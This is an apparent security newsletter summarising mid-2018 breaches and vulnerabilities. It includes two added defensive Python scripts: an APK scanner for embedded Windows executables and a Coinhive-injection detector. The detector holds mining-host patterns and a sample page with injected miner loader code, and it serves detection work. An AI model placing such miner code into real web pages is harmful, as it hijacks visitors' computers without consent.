Polyverse Weekly Breach Report


A snapshot of the breaches and reported vulnerabilities of last week

Dixons Carphone

The Dixons Carphone data breach was far larger than the company first disclosed. Personal information belonging to around 10 million customers may have been accessed by the attackers, up from the original estimate of 1.2 million people affected. To read more: https://www.zdnet.com/article/dixons-carphone-data-breach-number-of-victims-rises-from-1-2m-to-10m/

Clarkson

Clarkson PLC revealed that a single compromised user account was the entry point for its 2017 data breach. The attackers had access to internal systems from May 31 until November 4, 2017. To read more: https://www.zdnet.com/article/clarkson-says-single-user-account-to-blame-for-data-breach/

Abstractism

Valve has pulled Abstractism from its Steam store after allegations that the game was using players’ computers to mine cryptocurrency. The game was also accused of counterfeiting items from other games and selling the fakes at inflated prices. To read more: https://hotforsecurity.bitdefender.com/blog/steam-game-abstractism-pulled-after-cryptomining-accusations-20171.html

Pentagon

The US military is creating a list of overseas organizations that the Pentagon and its contractors should not buy software from due to security concerns. Most of these organizations are based in Russia and China. To read more: https://www.theregister.co.uk/2018/07/30/pentagon_russia_china_software_ban/

Yale

Yale University disclosed a security breach that occurred a decade ago. The intrusion took place between 2008 and 2009 and affected 119,000 individuals, but it was not discovered until June of this year. To read more: https://www.zdnet.com/article/yale-discloses-old-school-data-breach/

Reddit

An attacker broke into a few of Reddit’s systems by intercepting the SMS-based two-factor codes of several employee accounts and read user data. This included current email addresses and a 2007 database backup containing usernames, email addresses and old salted and hashed passwords. Reddit says the attacker gained read access only and did not obtain write access to any of its systems. To read more: https://www.reddit.com/r/announcements/comments/93qnm5/we_had_a_security_incident_heres_what_you_need_to/?st=JKBEHH8G&sh=562ab497

Gorgon Group

A Pakistan-based hacking group, dubbed Gorgon Group, is carrying out targeted attacks against governments. The attackers are combining spear-phishing and malware against government organizations in the UK, Spain, Russia and the US with a broader criminal malware campaign. To read more: https://www.zdnet.com/article/hacking-group-combines-spear-phishing-with-mass-malware-campaign/

UnityPoint Health

Around 1.4 million patients may have had their information compromised in a cyberattack that gave hackers access to internal UnityPoint Health email accounts. Employees fell for a phishing campaign and handed their email login credentials to the attackers. To read more: https://wcfcourier.com/news/local/cyber-attack-unitypoint-says-million-affected-in-phishing-scam/article_feccbc10-4ed4-53ff-8168-2c30091f5aa9.html

TCM Bank

A website misconfiguration on TCM Bank’s site exposed the personal information of people who applied for cards between March 2017 and mid-July 2018. TCM is a subsidiary of Washington, DC-based ICBA Bancard Inc, which helps community banks offer credit cards to their customers. To read more: https://krebsonsecurity.com/2018/08/credit-card-issuer-tcm-bank-leaked-applicant-data-for-16-months/

Middle Eastern Governments

A hacking group called Leafminer has attacked networks in Saudi Arabia, the UAE, Qatar, Kuwait, Bahrain, Egypt, Israel and Afghanistan. The group’s targets include the “energy, telecommunications, financial services, transportation and government” sectors. To read more: https://www.jpost.com/Israel-News/Politics-And-Diplomacy/Report-Iran-targeted-Israel-in-cyber-attack-563937

Salesforce.com

Salesforce.com is warning customers about an API bug that may have leaked user data from its Marketing Cloud platform. The issue affected users of the Email Studio and Predictive Intelligence products. According to Salesforce, a code change shipped in a Marketing Cloud release caused REST API calls to be handled incorrectly, so that a call could retrieve or write data belonging to another customer’s account; the change has since been corrected. To read more: https://threatpost.com/salesforce-com-warns-marketing-customers-of-data-leakage-snafu/134703/

Reported Vulnerabilities

Malvertising campaign

Security researchers at Check Point observed a malvertising campaign generating over 40,000 infection attempts per week. The campaign, called Master134, hijacks traffic from over 10,000 compromised WordPress sites and sells it through AdsTerra, a real-time bidding ad platform, from where it is redirected to exploit kits. To read more: https://www.theregister.co.uk/2018/07/30/malvertising_wordpress/

Symantec-chained certs

By October, TLS certificates chaining to Symantec’s legacy roots (which include the GeoTrust, Thawte and RapidSSL brands) will be rejected by both Firefox and Chrome, with Firefox 63 and Chrome 70. The switch will affect about 3.5 percent of the top one million sites; PayPal is among the major sites still serving such certificates. Operators who have not yet reissued their certificates from DigiCert (which took over Symantec’s CA business) or another CA will see browsers block their sites. To read more: https://www.zdnet.com/article/mozilla-warns-it-plans-to-distrust-all-symantec-chained-certs-in-october/

Android Apps

Security researchers at Palo Alto Networks discovered 145 apps in the Google Play store whose APK packages contained malicious Microsoft Windows executable files. The embedded code cannot infect an Android device, because it needs to run on a Windows system; the most likely explanation is that the developers built the apps on infected Windows machines, which is a supply-chain problem rather than an Android one. To read more: https://www.grahamcluley.com/android-apps-infected-windows-malware/
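The check a practitioner wants here is whether an APK (which is just a ZIP archive) carries a Windows PE executable under any file name. The script below is an added example, not code from the Palo Alto report or from any of the apps involved: it walks the archive members and recognises a PE file by its structure (the "MZ" magic and the "PE\0\0" signature at the offset stored in e_lfanew) rather than by extension. The sample archive it builds is a constructed fixture with a fake PE header, not a real APK or real malware.

```python
"""Scan an Android APK (a ZIP archive) for embedded Windows PE executables."""
import io
import struct
import zipfile

PE_SIGNATURE = b"PE\x00\x00"


def looks_like_pe(data: bytes) -> bool:
    """Return True if `data` starts with a DOS/PE header.

    A PE file begins with the 'MZ' magic; the 32-bit little-endian field at
    offset 0x3C (e_lfanew) points at the 'PE\\0\\0' signature.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


def find_pe_members(apk_bytes: bytes) -> list:
    """Return the names of ZIP members that contain a PE executable,
    regardless of the extension they were stored under."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as member:
                head = member.read(4096)  # the header is enough to decide
            if looks_like_pe(head):
                hits.append(info.filename)
    return hits


def build_sample_apk() -> bytes:
    """Constructed test fixture (not a real APK and not real malware):
    a ZIP with a harmless text asset, a dex-like stub, and a minimal fake
    PE header hidden under a misleading '.png' name."""
    fake_pe = bytearray(b"MZ" + b"\x00" * 0x3E)       # 0x40-byte DOS header
    struct.pack_into("<I", fake_pe, 0x3C, 0x80)       # e_lfanew -> 0x80
    fake_pe += b"\x00" * (0x80 - len(fake_pe))
    fake_pe += PE_SIGNATURE + b"\x00" * 64
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("assets/readme.txt", "hello")
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 64)
        zf.writestr("res/drawable/icon.png", bytes(fake_pe))
    return buf.getvalue()


if __name__ == "__main__":
    print(find_pe_members(build_sample_apk()))
```

Run it against a real APK with `find_pe_members(open("app.apk", "rb").read())`. A hit does not mean the Android app is malicious in itself, but it does mean the build environment that produced it was contaminated, which is the finding the Palo Alto researchers reported.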

Bitfi

A cryptocurrency wallet, said to be “unhackable”, appears to have been hacked a week after it launched. Bitfi has offered a bounty of $250,000 for true exploits and attacks to the wallet. To read more: https://www.zdnet.com/article/unhackable-bitfi-cryptocurrency-wallet-just-got-hacked/

ISP-Grade routers

A hacking campaign compromising tens of thousands of MikroTik routers has been uncovered. The routers were hacked through a known vulnerability in their Winbox management service, which MikroTik had patched in April 2018 but many operators had not applied, and were then used to inject Coinhive cryptomining scripts into web pages passing through them. More than 170,000 active MikroTik devices have been compromised. To read more: https://threatpost.com/huge-cryptomining-attack-on-isp-grade-routers-spreads-globally/134667/
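Because the injection happens in the router, the page a user receives can carry a miner that is absent from the origin server, so the useful check is on the HTML as the client or a web proxy actually sees it. The detector below is an added example, not code from the Threatpost article or from MikroTik: it parses the received HTML and flags script tags loading the Coinhive library from its known hosts, plus inline calls to the Coinhive API, extracting the site key the attacker mines to. The host list and the sample page are assumptions for the example; the 32-character site key in the sample is a constructed placeholder, not a real one.

```python
"""Flag HTML that carries an injected Coinhive browser-mining loader."""
import re
from html.parser import HTMLParser

# Domains the Coinhive library was served from (assumed list for this example).
COINHIVE_HOSTS = ("coinhive.com", "coin-hive.com", "authedmine.com")

# Inline start-up looks like: new CoinHive.Anonymous('<site key>').start()
SITE_KEY_RE = re.compile(
    r"CoinHive\.(?:Anonymous|User|Token)\s*\(\s*['\"]([A-Za-z0-9]{20,})['\"]"
)


class MinerFinder(HTMLParser):
    """Collects Coinhive loader URLs and site keys from a page."""

    def __init__(self):
        super().__init__()
        self.loader_srcs = []
        self.site_keys = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        src = dict(attrs).get("src") or ""
        if any(host in src.lower() for host in COINHIVE_HOSTS):
            self.loader_srcs.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands over <script> bodies verbatim, so the regex
        # sees the raw JavaScript.
        if self._in_script:
            self.site_keys.extend(SITE_KEY_RE.findall(data))


def scan_html(html: str) -> dict:
    """Return what was found and whether the page should be treated as infected."""
    finder = MinerFinder()
    finder.feed(html)
    finder.close()
    return {
        "loaders": finder.loader_srcs,
        "site_keys": finder.site_keys,
        "infected": bool(finder.loader_srcs or finder.site_keys),
    }


# Constructed sample of a page as a client behind a compromised router might
# receive it; the site key is a placeholder, not a real Coinhive key.
INJECTED_PAGE = """<html><head><title>Weather</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
  miner.start();
</script></head><body><p>Sunny, 24C</p></body></html>"""

CLEAN_PAGE = """<html><head><title>Weather</title>
<script src="/static/app.js"></script></head>
<body><p>Sunny, 24C</p></body></html>"""

if __name__ == "__main__":
    print(scan_html(INJECTED_PAGE))
    print(scan_html(CLEAN_PAGE))
```

Feed `scan_html` the body of responses captured at the client or proxy rather than fetched directly from the origin; comparing the two is what reveals an in-path injector such as a compromised router. The site key is worth logging, since a campaign typically reuses one key across every page it injects.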
